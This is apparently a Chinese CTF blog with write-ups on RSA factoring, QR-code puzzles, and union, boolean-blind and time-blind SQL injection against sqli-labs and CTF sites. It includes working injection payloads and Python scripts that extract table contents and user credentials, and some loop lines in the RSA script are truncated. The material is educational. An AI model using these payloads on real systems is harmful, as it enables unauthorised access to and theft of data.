流年、乱了浮生

文件上传漏洞<一>

2019-08-06T08:22:40.000Z

CRYPTO-RSA编码

2019-07-31T14:19:04.000Z

概论

RSA算法

RSA算法是现今使用最广泛的公钥密码算法，也是号称地球上最安全的加密算法。根据密钥的使用方法，可以将密码分为对称密码和公钥密码。对称密码：加密和解密使用同一种密钥的方式，公钥密码：加密和解密使用不同的密码的方式，因此公钥密码通常也称为非对称密码。

RSA加密

加密要用到公匙（n，e），公匙是公开的任何人可见，通式

1	c ≡ m^e (mod n)

其中m就是明文了，但m必须是整数（字符串可以取ascii值或unicode值），且m必须小于n。

RSA解密

得到c，使用私匙（n，d）解密，私匙是私有的，通式

1	m＝c^d mod n

RSA加密原理

步骤	说明	描述	备注
1	找出质数	p 、q	-
2	计算公共模数	n = p * q	-
3	欧拉函数	φ(N) = (p-1)(q-1)	-
4	计算公钥e	1 < e < φ(N)	e的取值必须是整数 e和 φ(n) 必须是互质数
5	计算私钥d	e * d % φ(n) = 1	-
6	加密	c＝m^e mod n	c：密文 m：明文
7	解密	m＝c^d mod n	c：密文 m：明文

RSA算法原理详解参考文章：http://www.ruanyifeng.com/blog/2013/07/rsa_algorithm_part_two.html

例题

实验吧 - RSAROLL

题目地址：http://www.shiyanbar.com/ctf/1918

打开链接

{920139713,19}
 
704796792
752211152
274704164
18414022
368270835
483295235
263072905
459788476
483295235
459788476
663551792
475206804
459788476
428313374
475206804
459788476
425392137
704796792
458265677
341524652
483295235
534149509
425392137
428313374
425392137
341524652
458265677
263072905
483295235
828509797
341524652
425392137
475206804
428313374
483295235
475206804
459788476
306220148

分析可知，{920139713,19}是公匙，n=920139713，e=19，下面的就是密文了也就是c={704796792
，752211152，……}，根据这些求明文{m1，m2，……}

解题步骤：

1.分解n，得到p，q

def crackN(n):
    i=2
    while i
        if n % i==0:
          break
        i=i+1
 
    return(i)

2.根据p,q获得欧拉数

1	o_n=int(p-1)*int((n/p)-1)

3.根据扩展欧几里得算法获得d

def exgcd(m,n,x,y):
        if n == 0:
                x = 1
                y = 0
                return (m,x,y)
        a1 = b = 1
        a = b1 = 0
        c = m
        d = n
        q = int(c/d)
        r = c%d
        while r:
                c = d
                d = r
                t = a1
                a1 = a
                a = t-q*a
                t = b1
                b1 = b
                b = t-q*b
                q = int(c/d)
                r = c%d
        x = a
        y = b
        return (d,x,y)

返回值为数组

1	d=exgcd(o_n,e,0,0)[2]

4.根据d解密密文c获得m

1	chr(pow(c,d,n))

5.遍历密文数组c获得m序列

s=""
while k
              s=s+(chr(pow(c[k],d,n)))
              k=k+1

最终脚本：


e=19
n=920139713
c=[
704796792,
752211152,
274704164,
18414022,
368270835,
483295235,
263072905,
459788476,
483295235,
459788476,
663551792,
475206804,
459788476,
428313374,
475206804,
459788476,
425392137,
704796792,
458265677,
341524652,
483295235,
534149509,
425392137,
428313374,
425392137,
341524652,
458265677,
263072905,
483295235,
828509797,
341524652,
425392137,
475206804,
428313374,
483295235,
475206804,
459788476,
306220148,
]
def exgcd(m,n,x,y):
        if n == 0:
                x = 1
                y = 0
                return (m,x,y)
        a1 = b = 1
        a = b1 = 0
        c = m
        d = n
        q = int(c/d)
        r = c%d
        while r:
                c = d
                d = r
                t = a1
                a1 = a
                a = t-q*a
                t = b1
                b1 = b
                b = t-q*b
                q = int(c/d)
                r = c%d
        x = a
        y = b
        return (d,x,y)
def crackN(n):
    i=2
    while i
        if n % i==0:
          break
        i=i+1
 
    return(i)
p=crackN(n)
k=0
o_n=int(p-1)*int((n/p)-1)
d=exgcd(o_n,e,0,0)[2]
s=""
while k
              s=s+(chr(pow(c[k],d,n)))
              k=k+1
print(s)

运行

得到flag：flag{13212je2ue28fy71w8u87y31r78eu1e2}

参考文章：https://blog.csdn.net/janelml/article/details/89877099

总结

CTF中关于RSA的题还是挺多的，而且是有点难的，基本上都要写脚本才能做出来，也需要一些辅助的工具什么的，比如yafu、rsatool等。有一个很重要也是必须的一个库就是gmpy2，gmpy2是Python的一个扩展库，是对GMP的封装，它的前身是gmpy，经过其作者的调整和封装，使得gmpy2的使用大大简化，可以先安装下。本来还要写Jarvis OJ上的几道RSA的题，脚本要在网上找但是都要用到这个gmpy2但是这个gmpy2我弄个快一天了还是没弄好自己又不会写脚本，所以就没写，等之后把gmpy2装好了再补吧。

Jarvis OJ：平台地址：www.jarvisoj.com

yafu：下载地址：https://sourceforge.net/projects/yafu/安装使用：https://www.cnblogs.com/pcat/p/7508205.html

gmpy2：安装使用：https://blog.csdn.net/x_yhy/article/details/83903367、https://www.cnblogs.com/pcat/p/5746821.html

其他常用工具：https://www.lizenghai.com/archives/24289.html

CTF中RSA常见攻击方法：https://www.anquanke.com/post/id/84632

SQL注入<四>-时间盲注

2019-07-28T08:50:01.000Z

概论

时间盲注：时间盲注与布尔盲注的注入原理大致相同，区别就是时间盲注没有回显或者正确和错误页面回显一样。所以时间型盲注需要页面沉睡时间判断，通过 sleep（）函数测试，通过if（）和sleep（）联合逐个猜解数据，例：

1	http://127.0.0.1/Less-9/?id=1' and (if(ascii(substr(database(),1,1))>100,1,sleep(5)) --+

如果当前查询的当前数据库ascii(substr(database()),1,1)的第一个字符的ASCII码大于100，ture执行select 1页面正常返回，false执行select sleep(5)页面沉睡5秒后返回。1和sleep（5）也可以换下位置。

常用函数：

sleep（n）：使数据库在暂停n秒之后再将搜索结果输出
if（（条件），m，n）：若条件为真 返回m，若条件为假 返回n
length（database()）：返回当前数据库名长度
mid（database（），m，n）：返回数据库名的第m位之后的n位

sqli-labs less9

以sqli平台第九题为例写一下时间盲注

less9是基于Time-GET-单引号-字符型-盲注

进行注入测试，与上一关一样

http://127.0.0.1/sqli-labs-master/Less-9/?id=1
http://127.0.0.1/sqli-labs-master/Less-9/?id=1'
http://127.0.0.1/sqli-labs-master/Less-9/?id=1"
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' --+

但是发现不管上面那一个，页面返回是一样的回显为you are in………..

这样就不能根据页面的回显来判断匹配结果，要使用延时函数sleep()对两种输入进行区分。附源码


include("../sql-connections/sql-connect.php");
error_reporting(0);

if(isset($_GET['id']))
{
$id=$_GET['id'];
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
  echo '';
  echo 'You are in...........';
  echo "
";
    echo "";
  }
else 
{
echo '';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "
";
echo '';
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

注入过程与less8是一样的，payload也差不多，比上一关多了一个if函数

判断数据库长度

1
2
3

?id=1' and if(length(database())>1,1,sleep(4)) --+
?id=1' and if(length(database())>2,1,sleep(4)) --+
以此类推...

执行成功进行1，失败进行sleep(4)沉睡4秒，如图

所以数据库长度是8

下面都是一样的，根据页面返回时间不一样判断是否注入成功

爆数据库名

1	?id=1' and if(ascii(substr(database(),1,1))=100,1,sleep(5)) --+

通过修改substr的步长来进一步猜测数据库名的其他字符

爆表名

1	?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=105,1,sleep(5)) --+

爆列名

1	?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105,1,sleep(5)) --+

爆数据

1	?id=1' and if(ascii(substr((select id from users limit 0,1),1,1))=105,1,sleep(5)) --+

可以看出时间盲注的中心思想和布尔盲注相同，也通过截取函数查询逐个匹配想要的信息。

手工注入会很慢还是要写脚本跑，我还没找到很好的脚本。可以在网上找下。

也顺便提下less10，和Less9差别只在于单双引号，less10是双引号闭合改下payload，修改查询语句闭合后用脚本注入即可。

SQL注入<三>-bool盲注

2019-07-27T15:42:37.000Z

概论

盲注：在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入。盲注一般分为布尔盲注（Booleanbase）、基于时间的盲注（Timebase）、报错的盲注（Errorbase）。

布尔型：页面只返回True和False两种类型页面。利用页面返回不同，逐个猜解数据

常用函数：

length(str)：返回str字符串的长度。
substr(str, pos, len)：将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的，不是数组的0开始
mid(str,pos,len):同上
ascii(str)：返回字符串str的最左面字符的ASCII代码值。
ord(str):同上，返回ascii码
if(a,b,c) :a为条件，a为true，返回b，否则返回c，如if(1>2,1,0),返回0
sleep(n)：将程序挂起一段时间 n为n秒

sqli-labs less8

以sqli平台第八题为例写一下布尔盲注

进行注入测试

http://127.0.0.1/sqli-labs-master/Less-8/?id=1
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
http://127.0.0.1/sqli-labs-master/Less-8/?id=1"
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' --+

发现id=1’时页面没有返回内容应该就是不正确页面加上注释符后显示正确页面，可以确定单引号存在注入，正确页面显示you are in………..不正确页面没有

可以参考下源码：


//部分关键源码，源码下载：https://github.com/Audi-1/sqli-labs，可以搭建在本地
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))//GET方式传入id
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)//查到数据执行如下
{
  echo '';
  echo 'You are in...........';
  echo "
";
    echo "";
  }
else //否则执行如下从两者返回的网页结构不一样，可以作为我们盲注条件判断的依据
{
echo '';
//源码中注释了报错信息，所以不能用报错注入
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "
";
echo '';

}
}
else { echo "Please input the ID as parameter with numeric value";}
?>

看出之前的测试结果正确

判断数据库长度

1
2
3

http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())>1 --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())>2 --+
以此类推...

发现值为8时页面没有显示，说明database()的长度是8

爆数据库名

1 2	?id=2' and ascii(substr(database(),1,1))>99 --+或 ?id=2' and ascii(substr(database(),1,1))=99 --+

原理就是依次取出数据库名中的一个字符通过比较ASCII码值来判断猜出数据库名，这样就不能一个一个试了，需要写脚本，现在脚本不会写就借鉴大佬的了。爆数据库长度和数据库名python脚本

import requests
def database_len():
for i in range(1,10):
url = '''http://127.0.0.1/sqli-labs-master/Less-8/index.php'''
payload = '''?id=1' and length(database())>%s''' %i
# print(url+payload+'%23')
r = requests.get(url+payload+'%23')
if 'You are in' in r.text:
print(i)
 
else:
#print('false')
print('database_length:',i)
break
database_len()
 
def database_name():
name = ''
for j in range(1,9): //数据库长度为8
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" %(j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i

print(name)

break
print('database_name:',name)

database_name()

得到数据库名security

爆表名

1	?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>96 --+

原理和报数据库名是一样的，知识把database()换成了查表名语句，脚本把上面修改一下

import requests

def table_name():
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1)))=ord('%s')" %(j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i

print(name)

break
print('table_name:',name)

table_name()

修改limit 0,1，分别改成limit 1,1、limit 1,1、limit 2,1、limit 3,1，可以得到四个表名emails、referers、uagents、users

爆列名

1	?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>116 --+

表应该是users了，脚本

import requests

def column_name():
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),%d,1)))=ord('%s')" %(j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i

print(name)

break
print('column_name:',name)

column_name()

同理修改limit 0,1，可以得到三个列名id、username、password

爆数据

1	?id=1' and ascii(substr((select user from users limit 0,1),1,1)) > 96

脚本，源脚本

注：原脚本中u.content在python3中好像不能用要改成u.text。因为python3中text返回的是Unicode型的数据，content返回的是是二进制的数据，也就是说，如果你想取文本，可以通过u.text，如果想取图片、文件，则可以通过u.content

# -*- coding:utf8 -*-
import requests
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '.']  # 字典
url = 'http://127.0.0.1/sqli-labs-master/Less-8?id=1%27'
payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
str1 = 'You are in...........'
username = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
password = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
for i in range(1, 15):
    for j in range(1, 11):
       for l in list1:
            p = payload.format(n=i, w=j, d=username[i-1]+l)
            u = requests.get(url+p)
            if str1 in u.text:
                username[i-1] += l
                print (u'正在对比第', i, u'个记录的username的第', j, u'个字符', username[i-1])
payload2 = '%20and%20left((select%20password%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
for i in range(1, 15):
    for j in range(1, 11):
        for l in list1:
            p = payload2.format(n=i, w=j, d=password[i-1]+l)
            u = requests.get(url+p)
            if str1 in u.text:
                password[i-1] += l
                print (u'正在对比第', i, u'个记录的password的第', j, u'个字符', password[i-1])
print ('id    username    password')
for i in range(1, 15):
    print (i, '-', username[i-1], '-', password[i-1])

最后在网速好的时候跑这个脚本

总结

查询数据库的长度

1	and length(database())>1 --+

查询数据库名

1	and ascii(substr((select database()),1,1))>99 --+

查询表名的长度

1	and (select(length(table_name)) from information_schema.tables where table_schema = 'users' limit 0,1)>1 --+

查询表名

1	and ascii(substr((select table_name from information_schema.tables where table_schema='users' limit 1,1),1,1))>116 --+

查询列名的长度

1	and (select(length(column_name)) from information_schema.columns where table_name = 'users' limit 0,1)>1 --+

查询列名

1	and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>116 --+

查询字段的长度

1	and (select length(column_name) from information_schema.columns where table_name='users' limit 1,1)>10 --+

爆字段

1	and ascii(substr((select user from users limit 0,1),1,1))>96 --+

附后台数据库

MISC-二维码图片

2019-07-26T05:41:59.000Z

前言

可以上网查查了解一下二维码的原理，能学到一些知识也对我们做CTF二维码题有一定帮助。二维码出现在CTF题中一般都是穿插在其他题中，或者整体就是考查都是二维码，整体来说不算太难，如果会PS会更容易一些。推荐文章：CTF中二维码题目及答题技巧总结（二）。

题目复现

实验吧 - 复杂的QR_code

题目地址：http://www.shiyanbar.com/ctf/1856解题链接：http://ctf5.shiyanbar.com/stega/QR_code.png

打开链接，发现是一张二维码，尝试扫一下

扫出来是：secret is here

然后放在winhex里看一下，发现有一个隐藏的zip文件，zip里面有一个txt文件

所以binwalk一下，得到一个压缩包打开，是一个加密的txt文件，文件名叫4number.txt，密码应该就是4个数字了，那就暴力破解，可以用archpr（也可以用kali带的叫fcrackzip的工具）

密码就是7639了，打开文件输入密码得到flag：CTF{vjpw_wnoei}

bugkuCTF - 图穷匕见

解题链接：https://ctf.bugku.com/files/f6697e1f904a0c30b56f72fcf0023434/paintpaintpaint.jpg

保存图片，用winhex打开找到jpg文件尾FF D9发现后有一长串数字

观察下应该是16进制，将之后的数据保存到txt中，用notepad++打开，有一个插件可以解码

得到很多坐标，所以就要“画图”了，用gnuplot（下载）这个工具将这些坐标做成一张图即可，不过要先将坐标改成gnuplot能识别的坐标

把txt文件放到gnuplot的bin目录下，运行gnuplot

得到一个二维码

扫描得到flag：flag{40fc0a979f759c8892f4dc045e28b820}

bugkuCTF - 很普通的数独

题目地址：https://ctf.bugku.com/challenges#%E5%BE%88%E6%99%AE%E9%80%9A%E7%9A%84%E6%95%B0%E7%8B%AC(ISCCCTF)

下载压缩包后缀名改成.zip，打开后发现有25张数独的图片

然后呢？？看了大佬wp才明白这题是个啥

把这25张图片弄成5x5排列发现这其实是张二维码。1.png、5.png、21.png仔细看看就是是二维码的定位形状，三个角上的方形块，1.png是二维码右上角、5.png是二维码左下角、21.png是二维码左上角，所以把这三张换下顺序，1.png、5.png、21.png重命名成:5.png、21.png、1.png。

然后把有数字的格记为数字1(代表黑色)，没有的记为0(代表白色)，保存为txt文件

111111101010101000101000001111110000101111111
100000101100111101010011101100011001001000001
101110101110011111010011111101000101001011101
101110101101100010001010000011110001101011101
101110100011100100001111101111111011101011101
100000101100100000011000100001110100001000001
111111101010101010101010101010101011101111111
000000000011001101001000110100110011100000000
110011100100100001111111100100101000000101111
101001001011111111101110101011110101101001100
100000111100100100000110001101001101010001010
001100010011010001010011000100000010110010000
010110101010001111110100011101001110101101111
100011000100011100111011101101100101101110001
001100110100000000010010000111100101101011010
101000001011010111110011011111101001110100011
110111110111011001101100010100001110000100000
110101000010101000011101101101110101101001100
010011111110001011111010001000011011101101100
011001011001010101100011110101001100001010010
010111111111101011111111101101101111111111100
011110001100000100001000101000100100100011110
111110101110011100111010110100110100101010010
110010001011101011101000111100000011100010000
101011111011100111101111111100001010111110010
110100011000111000100111101101111101000100010
111101111110001001000011010110001111110111110
011001010101000110010100010001000101101010001
011101110101101101100100001101101000111101001
110110001001101100010101101111110100101100110
000011100111000000000100001010101111100010010
111010010011110011101110010100001011111010010
101001100010111111110100000100001010101010100
000010011001001101110101001111100101111101101
000010111101110001101011000001000101110100110
011110011010100010100000011011000001110010000
100110100100001101111111101100101110111110011
000000001111110101101000101011100100100011010
111111100011111011011010101101110011101011110
100000101110101101101000111110010001100010001
101110101011100001111111101101001000111111011
101110100110111101101000001001101100011101101
101110100000011101100001101010110010010010001
100000101011001011111011001011000011010110000
111111101010101001111011110101101110000101101

再把这些数字用python脚本画出二维码

from PIL import Image
x = 45
y = 45
 
im = Image.new('RGB', (x, y))
white = (255, 255, 255)
black = (0, 0, 0)
 
with open('file.txt') as f:
    for i in range(x):
        ff = f.readline()
        for j in range(y):
            if ff[j] == '1':
                im.putpixel((i, j), black)
            else:
                im.putpixel((i, j), white)
im.save("1.jpg")

把txt文件放到python目录下，运行python脚本，得到二维码（如果运行python脚本是出现UnicodeDecodeError: ‘gbk’ codec can’t decode byte 0xfe in position 0: illegal multibyte sequence错误，用notepad++打开txt文件将编码改为utf-8编码就行了）

扫描二维码，得到

1	Vm0xd1NtUXlWa1pPVldoVFlUSlNjRlJVVGtOamJGWnlWMjFHVlUxV1ZqTldNakZIWVcxS1IxTnNhRmhoTVZweVdWUkdXbVZHWkhOWGJGcHBWa1paZWxaclpEUmhNVXBYVW14V2FHVnFRVGs9

多次base64解码应该是7次，得到flag：flag{y0ud1any1s1}

参考文章：https://blog.csdn.net/zz_Caleb/article/details/88800201

bugkuCTF - 闪的好快

解题链接：https://ctf.bugku.com/files/6dcac03199e58749725cbcd9cc958a9b/masterGO.gif

打开后是一个二维码的gif动图

那就把每帧分开，可以用WPS图片查看也可以用stegsolve的Analysis->Frame Browser查看，有18张图片，挨个扫下得到flag：SYC{F1aSh_so_f4sT}

bugkuCTF - 多种方法解决

解题链接：http://123.206.87.240:8002/misc/3.zip

题目内容：在做题过程中你会得到一个二维码图片

下载压缩包打开发现是一个exe文件，放到winhex里面查看发现

所以这里要base64编码还原成图片，将文件后缀名改成.txt复制内容，在线转换，得到二维码

扫描二维码得到flag：KEY{dca57f966e4e4e31fd5b15417da63269}

bugkuCTF - 普通的二维码

题目地址：https://ctf.bugku.com/challenges#%E6%99%AE%E9%80%9A%E7%9A%84%E4%BA%8C%E7%BB%B4%E7%A0%81

下载压缩包打开有一张二维码图片

扫描得到：哈哈!就不告诉你flag就在这里!

没有什么用，那应该有隐藏的文件，放到winhex中查看

末尾有一串数字，观察右边数字只有0~7，所以可能是八进制，查下ASCII码表发现146就是f，然后就是3个数字一组，由八进制转换成字符了，可以使用python脚本：

a=[146,154,141,147,173,110,141,166,145,137,171,60,125,137,120,171,137,163,143,162,151,160,164,137,117,164,143,137,124,157,137,124,145,156,137,101,163,143,151,151,41,175]
j=''
for i in a:
j = j+chr(int(str(i),8))
print (j)

运行脚本得到flag：flag{Have_y0U_Py_script_Otc_To_Ten_Ascii!}

SQL注入<二>-联合查询注入

2019-07-21T06:09:21.000Z

概论

联合查询：union可合并两个或多个select语句的结果集，前提是由两条或两条以上的select语句组成，语句之间用关键字union分隔，union中的每个查询的列数必须相同。union会从查询结果集中自动去除了重复行。

利用前提：页面上有显示位。显示位：在一个网站的正常页面，服务端执行SQL语句查询数据库中的数据，客户端将数据展示在页面中，这个展示数据的位置就叫显示位。

常用函数：

1
2
3

group_concat():让查询获得的数据组成一行显示
count():用于统计个数（类似于表的个数，数据库的个数等等）
concat():将多个字符串拼接在一起

例题

实验吧 - 因缺思汀的绕过

题目地址：http://www.shiyanbar.com/ctf/1940 解题链接：http://ctf5.shiyanbar.com/web/pcat/index.php

题目内容：访问解题链接去访问题目,可以进行答题。根据web题一般解题思路去解答此题。看源码，请求，响应等。提交与题目要求一致的内容即可返回flag。然后提交正确的flag即可得分。web题主要考察SQL注入，XSS等相关知识。涉及方向较多。此题主要涉及源码审计，MySQL相关的知识。

打开后，查看源码发现有个注释这应该是源码所在的位置了，访问一下（将source.txt复制到当前地址栏里替换index.php）的确是源码


error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
echo ''."
";
echo ''."
";
echo ''."
";
echo ''."
";
echo ''."
";

echo ''."
";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "水可载舟，亦可赛艇！";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇！";
    }
}else{
print "一颗赛艇！";
}
mysql_close($con);
?>

分析下源码（专业点就是源码审计），

1	$filter = "and\|select\|from\|where\|union\|join\|sleep\|benchmark\|,\|$\|$";

这行代码就是把$filter中的那些SQL注入的关键字给过滤了，那绕过这个限制只需要不用带这些关键字的SQL语句就行，否则网页返回”水可载舟，亦可赛艇！”

1	$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";

将uname作为条件输入，然后通过提交的uname去数据库中查询uname和pwd，然后把查询到的pwd和用户输入的pwd再进行对比

1	if (mysql_num_rows($query) == 1)

数据库影响数为1返回结果只能有一条，这是可以使用 limit 的返回来判断数据库中总共有几个人。可以构造：

1’ or 1 limit 1 offset 0#返回“亦可赛艇！”（1个人）

1’ or 1 limit 1 offset 1#返回“亦可赛艇！”（两个人）

1’ or 1 limit 1 offset 2#返回“一颗赛艇！”（没有第三个人）说明有两个用户

注：limit 1查询一行、offset 2从第二行开始查询

if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "亦可赛艇！";
    }

传入的pwd和查询出来的结果一致就输出flag否则报错，使if判断为true得到flag，可以利用group by with rollup，group by with rollup会在统计后的产生一条null信息，然后在pwd里不写值，if就为true了。

注：GROUP BY 语句用于结合聚合函数，根据一个或多个列对结果集进行分组。with rollup详解可以看这里

最终payload为

1	1' or 1 group by pwd with rollup limit 1 offset 2#

flag为CTF{with_rollup_interesting}

bugkuCTF - 这是一个神奇的登录框

题目链接：http://123.206.87.240:9001/sql/

先随意输入用户名密码页面返回

找注入点，输入1’，页面返回

输入1“，页面报错返回

说明可以注入，这题按照基本注入步骤就可以了

判断字段个数，输入1”order by 1,2#

输入1”order by 1,2,3#

说明有两列

爆库名：输入1” union select database(),2#，得到库名bugkusql1

爆表名：输入1” union select table_name,2 from information_schema.tables where table_schema=’bugkusql1’ #，得到表名falg1

爆列名（字段）：输入1” union select column_name,2 from information_schema.columns where table_name=’flag1’ #，得到列名flag1

查数据：输入1” union select flag1,2 from flag1 #，得到值也就是flaged6b28e684817d9efcaf802979e57aea，提交时要加上flag{}

bugkuCTF - 成绩单

题目链接：http://123.206.87.240:8002/chengjidan/

与上题思路是一样的，依次输入1，2，3都有输出，输入1‘无回显，输入1’#返回龙龙龙的成绩，所以这是字符型注入。

判断字段个数：输入

1' order by 1#
1' order by 2#
1' order by 3#
1' order by 4#

都有回显，再往后输入5#时无回显，所以字段数为4

爆库名：输入0’ union select 1,2,3,database()#，不用1是因为id=1我们的东西会被覆盖它会显示龙龙龙的成绩，所以要换一个id，得到库名skctf_flag

爆表名：输入0’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#，得到表名fl4g，sc

爆列名（字段）：输入0’ union select 1,2,3,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’fl4g’)#，得到列名skctf_flag

查数据：输入0’ union select 1,2,3,skctf_flag from fl4g#，得到值即flagBUGKU{Sql_INJECT0N_4813drd8hz4}

总结

获取数据库名

1	select schema_name from information_schema.schemata

获取表名

1	select table_name from information_schema.tables

获取所有列名

1	select column_name from information_schemata.column()

information_schema数据库是MySQL自带的，它提供了访问数据库元数据的方式。元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。
在MySQL中，把information_schema看作是一个数据库，确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。在information_schema中，有数个只读表，它们实际上是视图，而不是基本表，因此，你将无法看到与之相关的任何文件。

information_schema数据库表说明：

schemata表：提供了当前mysql实例中所有数据库的信息。show databases的结果取之此表。

tables表：提供了关于数据库中的表的信息（包括视图）。详细表述了某个表属于哪个schema，表类型，表引擎，创建时间等信息。show tables from schemaname的结果取之此表。

columns表：提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。show columns from schemaname.tablename的结果取之此表。

statistics表：提供了关于表索引的信息。show index from schemaname.tablename的结果取之此表。

user_privileges（用户权限）表：给出了关于全程权限的信息。该信息源自mysql.user授权表，是非标准表。

schema_privileges（方案权限）表：给出了关于方案（数据库）权限的信息。该信息来自mysql.db授权表，是非标准表。

table_privileges（表权限）表：给出了关于表权限的信息。该信息源自mysql.tables_priv授权表，是非标准表。

column_privileges（列权限）表：给出了关于列权限的信息。该信息源自mysql.columns_priv授权表，是非标准表。

character_sets（字符集）表：提供了mysql实例可用字符集的信息。show character set结果集取之此表。

collations表：提供了关于各字符集的对照信息。

collation_character_set_applicability表：指明了可用于校对的字符集。这些列等效于show collation的前两个显示字段。

table_constraints表：描述了存在约束的表。以及表的约束类型。

key_column_usage表：描述了具有约束的键列。

routimes表：提供了关于存储子程序（存储程序和函数）的信息。此时，routines表不包含自定义函数（udf），名为“mysql.proc name”的列指明了对应于information_schema.routines表的mysql.proc表列。

views表：给出了关于数据库中的视图的信息。需要有show views权限，否则无法查看视图信息。

triggers表：提供了关于触发程序的信息。必须有super权限才能查看该表

参考文章：https://blog.csdn.net/xuchen16/article/details/82785371

可以发现在进行SQL注入时会用到许多SQL函数等，所以掌握SQL注入要多练习正所谓熟能生巧，见得多练得多才能记住每个关键字，函数等的含义和用法。

SQL注入<一>-简单注入

2019-07-20T05:34:05.000Z

题目复现

hackinglab - 最简单的SQL注入

题目地址：http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php

查看源代码有个提示（其实没啥用）

意思是说用户名为admin，这题非常简单就不多说了，用户名直接输入admin’#或‘ or 1=1#等就行，构造SQL语句

1 2	select * from admin where username='admin'#' and password='123456'或 select * from admin where username='' or 1=1#' and password='123456'

得到flag：iamflagsafsfskdf11223

实验吧 - 登陆一下好吗？？

题目链接：http://www.shiyanbar.com/ctf/1942

打开后是一个登录框

直接查看源码发现没有什么提示，既然是SQL注入，那就username输入‘ or 1=1#password随便输试下

发现这应该是个普通的简单SQL注入，把输入的数据和数据库中数据对比，所以可以猜测后台SQL判断语句大概是

1	select * from user where username='username' and password='password'

看下输入‘ or1=1#后页面返回内容，发现or和#被过滤掉了，也就是说带or的SQL语句应该是不能用了而且不能通过注释把username后面注释绕过了。那就要使where后面条件恒为真绕过登陆了，使username和password执行结果为true，所以可以输入1’=’0（0去掉是一样的）等，为什么呢？

看下输入之后SQL语句变为

1	select * from user where username='1'='0' and password='1'='0'

